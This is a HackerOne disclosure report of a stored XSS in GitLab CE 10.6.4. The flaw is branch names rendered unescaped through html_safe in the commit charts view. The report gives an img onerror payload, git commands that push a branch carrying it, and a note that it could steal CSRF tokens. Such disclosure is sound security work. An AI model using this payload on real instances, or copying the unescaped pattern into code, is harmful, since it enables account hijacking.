Skip to content

Stored XSS in Graph/Charts due to unescaped Branch-name

Link:          https://hackerone.com/reports/341685
By:            @fransrosen

Details: Hi,

When having a branch named with an HTML-element including javascript, the Chart-view located at:

/frans/*REPO*/graphs/*BRANCH*/charts

is not sanitizing the branch-name properly:

<h4>
Commit statistics for <strong><img/src='x'onerror=alert(1)></strong> Dec 22
 - Jan 09

</h4>

Screen_Shot_2018-04-21_at_23.56.54

I'm running:

GitLab Community Edition 10.6.4 dee2c87

but also verified the issue is in master:

https://gitlab.com/gitlab-org/gitlab-ce/commit/9f49329cbb09faa17fd29e959828e487267e65c2
        - start_time = capture do
          #{@commits_graph.start_date.strftime('%b %d')}
        - end_time = capture do
          #{@commits_graph.end_date.strftime('%b %d')}
        = (_("Commit statistics for %{ref} %{start_time} - %{end_time}") % { ref: "<strong>#{@ref}</strong>", start_time: start_time, end_time: end_time }).html_safe

This seems to have been introduced at the 8th of Feb this year due to localization changes.

PoC

First, clone an existing project:

git clone https://gitlab/test/xxx.git .

Then add a new branch and commit to it:

git checkout -b "<img/src='x'onerror=alert(document.domain)>"
mv x y
git add .
git commit -m "test"
git push --set-upstream origin "<img/src='x'onerror=alert(document.domain)>"

Then by going to the Charts-section under Repository and selecting the new branch, the XSS will run (In Chrome, the XSS-auditor will trigger since the payload is in the URL, but Firefox should show it running)

Impact

The stored XSS is triggering for anyone, also triggering on gitlab.com, and it can trigger on public repos. It will not bypass the XSS-auditor as far as I can see, but there might be bypasses I do not know of. You could easily build a PoC that would modify the email address of the current user stealing their CSRF-token as soon as the script triggers, or stealing information about private repositories.

Regards, Frans

The hacker selected the Cross-site Scripting (XSS) - Stored weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:

URL http://gitlab-instance.localhost/frans/REPO/graphs/BRANCH/charts

Verified Yes